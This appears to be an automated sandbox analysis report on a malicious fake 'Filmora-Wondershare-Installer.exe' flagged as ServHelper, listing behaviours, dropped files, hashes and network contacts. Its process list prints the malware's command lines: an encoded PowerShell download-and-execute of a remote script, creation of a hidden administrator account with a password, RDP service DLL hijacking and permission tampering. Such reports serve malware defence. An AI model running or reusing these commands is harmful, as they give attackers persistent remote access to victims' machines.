Analysis Overview
SHA256
79745c2263c8abe5b916e39e577652c029b5b586e7ccb39ee63ed0fc1568c39d
Threat Level: Known bad
The file Filmora-Wondershare-Installer.exe was found to be: Known bad.
Malicious Activity Summary
ServHelper
Grants admin privileges
Sets DLL path for service in the registry
Modifies RDP port number used by Windows
Executes dropped EXE
Blocklisted process makes network request
UPX packed file
Possible privilege escalation attempt
Modifies file permissions
Checks computer location settings
Loads dropped DLL
Deletes itself
Writes to the Master Boot Record (MBR)
Drops file in System32 directory
Drops file in Windows directory
Drops file in Program Files directory
Enumerates physical storage devices
Script User-Agent
Suspicious use of SetWindowsHookEx
Runs net.exe
Suspicious use of AdjustPrivilegeToken
Modifies Internet Explorer settings
Suspicious behavior: EnumeratesProcesses
Modifies registry key
Modifies registry class
Suspicious use of WriteProcessMemory
Modifies data under HKEY_USERS
Suspicious behavior: LoadsDriver
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2021-07-21 08:36
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2021-07-21 08:36
Reported
2021-07-21 08:39
Platform
win7v20210408
Max time kernel
138s
Max time network
117s
Command Line
Signatures
ServHelper
Grants admin privileges
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ViJoy.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Templers\exe2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Templers\exe1.exe | N/A |
| N/A | N/A | C:\Users\Public\Documents\Wondershare\NFWCHK.exe | N/A |
Modifies RDP port number used by Windows
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Sets DLL path for service in the registry
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ViJoy.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ViJoy.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ViJoy.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Templers\exe2.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\AppData\Roaming\Templers\exe2.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\rfxvmt.dll | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\branding\mediasrv.png | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\branding\mediasvc.png | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_bf8fcc3e-dc38-4e47-8a0a-61c1d7ee1ce1 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_22a0fb91-0a7e-4f4f-909a-09a5936fd463 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\branding\mediasvc.png | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\branding\Basebrd | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_71d73dfa-9806-45e4-9d02-d87a461f1446 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_d17f9032-1958-4b77-a43f-1d6b10a9fe5c | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_725cea96-4475-4aea-81a2-5870b5a272df | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a4ea35f8-9334-45d7-b046-04ba4c113636 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_8f611f24-26f4-4bc8-b3bc-34b77e97c702 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4322f20e-7bce-4494-add3-41d75cb9dbe7 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_5cc3eecd-98e8-4477-b28f-7de3d0c5fdb0 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_8dfe6266-3926-4017-ad19-435b3d0931fd | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\branding\wupsvc.jpg | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\branding\ShellBrd | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\branding\mediasrv.png | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\branding\wupsvc.jpg | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ED5RZGXD1520IJSCIS3D.temp | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_f3ae5c8a-6eec-4149-bce1-d1a9722caa0e | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main | C:\Users\Admin\AppData\Roaming\Templers\exe2.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = f0258fe81c7ed701 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\icacls.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Templers\exe2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Templers\exe2.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Filmora-Wondershare-Installer.exe
"C:\Users\Admin\AppData\Local\Temp\Filmora-Wondershare-Installer.exe"
C:\Users\Admin\AppData\Local\Temp\ViJoy.exe
"C:\Users\Admin\AppData\Local\Temp\ViJoy.exe"
C:\Users\Admin\AppData\Roaming\Templers\exe2.exe
"C:\Users\Admin\AppData\Roaming\Templers\exe2.exe"
C:\Users\Admin\AppData\Roaming\Templers\exe1.exe
"C:\Users\Admin\AppData\Roaming\Templers\exe1.exe"
C:\Users\Public\Documents\Wondershare\NFWCHK.exe
C:\Users\Public\Documents\Wondershare\NFWCHK.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tnk0n035\tnk0n035.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6162.tmp" "c:\Users\Admin\AppData\Local\Temp\tnk0n035\CSC9E160A0322BD483483B2C3D605862D6.TMP"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
C:\Windows\system32\takeown.exe
"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
C:\Windows\system32\net.exe
"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
C:\Windows\system32\cmd.exe
cmd /c net start rdpdr
C:\Windows\system32\net.exe
net start rdpdr
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start rdpdr
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
C:\Windows\system32\cmd.exe
cmd /c net start TermService
C:\Windows\system32\net.exe
net start TermService
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start TermService
C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 000000 /del
C:\Windows\system32\net.exe
net.exe user WgaUtilAcc 000000 /del
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 8Pu5fM1s /add
C:\Windows\system32\net.exe
net.exe user WgaUtilAcc 8Pu5fM1s /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc 8Pu5fM1s /add
C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" QWOCTUPM$ /ADD
C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" QWOCTUPM$ /ADD
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" QWOCTUPM$ /ADD
C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
C:\Windows\system32\net.exe
net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 8Pu5fM1s
C:\Windows\system32\net.exe
net.exe user WgaUtilAcc 8Pu5fM1s
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc 8Pu5fM1s
C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
C:\Windows\System32\Wbem\WMIC.exe
wmic CPU get NAME
C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
C:\Windows\system32\cmd.exe
cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | platform.wondershare.com | udp |
| N/A | 47.91.67.36:80 | platform.wondershare.com | tcp |
| N/A | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| N/A | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| N/A | 8.8.8.8:53 | pgf5ga4g4b.cn | udp |
| N/A | 8.8.8.8:53 | pgf5ga4g4b.cn | udp |
| N/A | 206.188.196.143:443 | pgf5ga4g4b.cn | tcp |
Files
memory/1640-60-0x00000000008D0000-0x00000000008D1000-memory.dmp
memory/1640-62-0x000000001B520000-0x000000001B522000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\ViJoy.exe
| MD5 | 03051f3c44a2c8d196c95ea458b0aff4 |
| SHA1 | d19a86e11cccdf978ca2d1455d7026d7879869f7 |
| SHA256 | 555f654fb51e632ba2cf49b865b6de5f5772ffba0229d73021a1c6a6f65dab08 |
| SHA512 | 883e31033107ee9f008d34e84638fca2ee085e6cc7c41a288d1663a31beac7109efe718ab7f38f682c8e01a99736e3832c539c95fd4bf25124fed4c9e9eeba46 |
memory/1732-63-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\ViJoy.exe
| MD5 | 03051f3c44a2c8d196c95ea458b0aff4 |
| SHA1 | d19a86e11cccdf978ca2d1455d7026d7879869f7 |
| SHA256 | 555f654fb51e632ba2cf49b865b6de5f5772ffba0229d73021a1c6a6f65dab08 |
| SHA512 | 883e31033107ee9f008d34e84638fca2ee085e6cc7c41a288d1663a31beac7109efe718ab7f38f682c8e01a99736e3832c539c95fd4bf25124fed4c9e9eeba46 |
memory/1732-66-0x00000000002A0000-0x00000000002A1000-memory.dmp
memory/1732-68-0x0000000000B10000-0x0000000000B41000-memory.dmp
memory/1732-69-0x0000000004C40000-0x0000000004C41000-memory.dmp
\Users\Admin\AppData\Roaming\Templers\exe2.exe
| MD5 | c9622e294a0f3c6c4dfcf716cd2e6692 |
| SHA1 | 829498d010f331248be9fd512deb44d1eceac344 |
| SHA256 | f519d4517271e01ea6807890fcbc1573e64844b6a8105aa7c3462ea65bb3c7fe |
| SHA512 | d7e5bd51a819b1bb8ec59fbca742fbf40806b8e4e04f56efb00c8b5477b275d1479565b3a156628a86254801610dbef13250ef5b2015da1ef21ff869ef60f552 |
memory/1272-71-0x0000000000000000-mapping.dmp
\Users\Admin\AppData\Roaming\Templers\exe1.exe
| MD5 | eaee663dfeb2efcd9ec669f5622858e2 |
| SHA1 | 2b96f0d568128240d0c53b2a191467fde440fd93 |
| SHA256 | 6c4aab4c3bd1ba8f77a781d70ecbc1b4c7dfd9d3c7ad60158fb8d35d1d4246e2 |
| SHA512 | 211951f053ddecc6e0545a83119112d6ad375e226437d6a26ed493b362e51da3718131d59fb045c9b2feea91e04d3b82e9be4e52a46fe2e84ed4f3b4ed2213b3 |
C:\Users\Admin\AppData\Roaming\Templers\exe2.exe
| MD5 | c9622e294a0f3c6c4dfcf716cd2e6692 |
| SHA1 | 829498d010f331248be9fd512deb44d1eceac344 |
| SHA256 | f519d4517271e01ea6807890fcbc1573e64844b6a8105aa7c3462ea65bb3c7fe |
| SHA512 | d7e5bd51a819b1bb8ec59fbca742fbf40806b8e4e04f56efb00c8b5477b275d1479565b3a156628a86254801610dbef13250ef5b2015da1ef21ff869ef60f552 |
memory/1272-74-0x0000000075041000-0x0000000075043000-memory.dmp
memory/852-76-0x0000000000000000-mapping.dmp
\Users\Admin\AppData\Roaming\Templers\exe1.exe
| MD5 | eaee663dfeb2efcd9ec669f5622858e2 |
| SHA1 | 2b96f0d568128240d0c53b2a191467fde440fd93 |
| SHA256 | 6c4aab4c3bd1ba8f77a781d70ecbc1b4c7dfd9d3c7ad60158fb8d35d1d4246e2 |
| SHA512 | 211951f053ddecc6e0545a83119112d6ad375e226437d6a26ed493b362e51da3718131d59fb045c9b2feea91e04d3b82e9be4e52a46fe2e84ed4f3b4ed2213b3 |
C:\Users\Admin\AppData\Roaming\Templers\exe1.exe
| MD5 | eaee663dfeb2efcd9ec669f5622858e2 |
| SHA1 | 2b96f0d568128240d0c53b2a191467fde440fd93 |
| SHA256 | 6c4aab4c3bd1ba8f77a781d70ecbc1b4c7dfd9d3c7ad60158fb8d35d1d4246e2 |
| SHA512 | 211951f053ddecc6e0545a83119112d6ad375e226437d6a26ed493b362e51da3718131d59fb045c9b2feea91e04d3b82e9be4e52a46fe2e84ed4f3b4ed2213b3 |
memory/852-78-0x0000000041460000-0x000000004170A000-memory.dmp
memory/852-80-0x0000000040F32000-0x0000000040F34000-memory.dmp
memory/852-81-0x0000000040F34000-0x0000000040F36000-memory.dmp
memory/852-82-0x0000000040F36000-0x0000000040F37000-memory.dmp
memory/852-83-0x0000000040F37000-0x0000000040F38000-memory.dmp
C:\Users\Admin\AppData\Roaming\Templers\exe2.exe
| MD5 | c9622e294a0f3c6c4dfcf716cd2e6692 |
| SHA1 | 829498d010f331248be9fd512deb44d1eceac344 |
| SHA256 | f519d4517271e01ea6807890fcbc1573e64844b6a8105aa7c3462ea65bb3c7fe |
| SHA512 | d7e5bd51a819b1bb8ec59fbca742fbf40806b8e4e04f56efb00c8b5477b275d1479565b3a156628a86254801610dbef13250ef5b2015da1ef21ff869ef60f552 |
\Users\Public\Documents\Wondershare\NFWCHK.exe
| MD5 | 27cfb3990872caa5930fa69d57aefe7b |
| SHA1 | 5e1c80d61e8db0cdc0c9b9fa3b2e36d156d45f8f |
| SHA256 | 43881549228975c7506b050bce4d9b671412d3cdc08c7516c9dbbb7f50c25146 |
| SHA512 | a1509024872c99c1cf63f42d9f3c5f063afde4e9490c21611551ddd2322d136ce9240256113c525305346cf7b66ccca84c3df67637c8fecbfeebf14ffa373a2a |
memory/920-86-0x0000000000000000-mapping.dmp
C:\Users\Public\Documents\Wondershare\NFWCHK.exe
| MD5 | 27cfb3990872caa5930fa69d57aefe7b |
| SHA1 | 5e1c80d61e8db0cdc0c9b9fa3b2e36d156d45f8f |
| SHA256 | 43881549228975c7506b050bce4d9b671412d3cdc08c7516c9dbbb7f50c25146 |
| SHA512 | a1509024872c99c1cf63f42d9f3c5f063afde4e9490c21611551ddd2322d136ce9240256113c525305346cf7b66ccca84c3df67637c8fecbfeebf14ffa373a2a |
C:\Users\Public\Documents\Wondershare\NFWCHK.exe.config
| MD5 | ad0967a0ab95aa7d71b3dc92b71b8f7a |
| SHA1 | ed63f517e32094c07a2c5b664ed1cab412233ab5 |
| SHA256 | 9c1212bc648a2533b53a2d0afcec518846d97630afb013742a9622f0df7b04fc |
| SHA512 | 85766a907331f60044ec205cf345453fc3d44bfcac296ac93a12e8a752b84290dfd94f73b71de82f46f9503177d29602cbb87549f89dc61373d889b4ea26634b |
C:\Users\Public\Documents\Wondershare\NFWCHK.exe
| MD5 | 27cfb3990872caa5930fa69d57aefe7b |
| SHA1 | 5e1c80d61e8db0cdc0c9b9fa3b2e36d156d45f8f |
| SHA256 | 43881549228975c7506b050bce4d9b671412d3cdc08c7516c9dbbb7f50c25146 |
| SHA512 | a1509024872c99c1cf63f42d9f3c5f063afde4e9490c21611551ddd2322d136ce9240256113c525305346cf7b66ccca84c3df67637c8fecbfeebf14ffa373a2a |
memory/920-90-0x0000000000B10000-0x0000000000B12000-memory.dmp
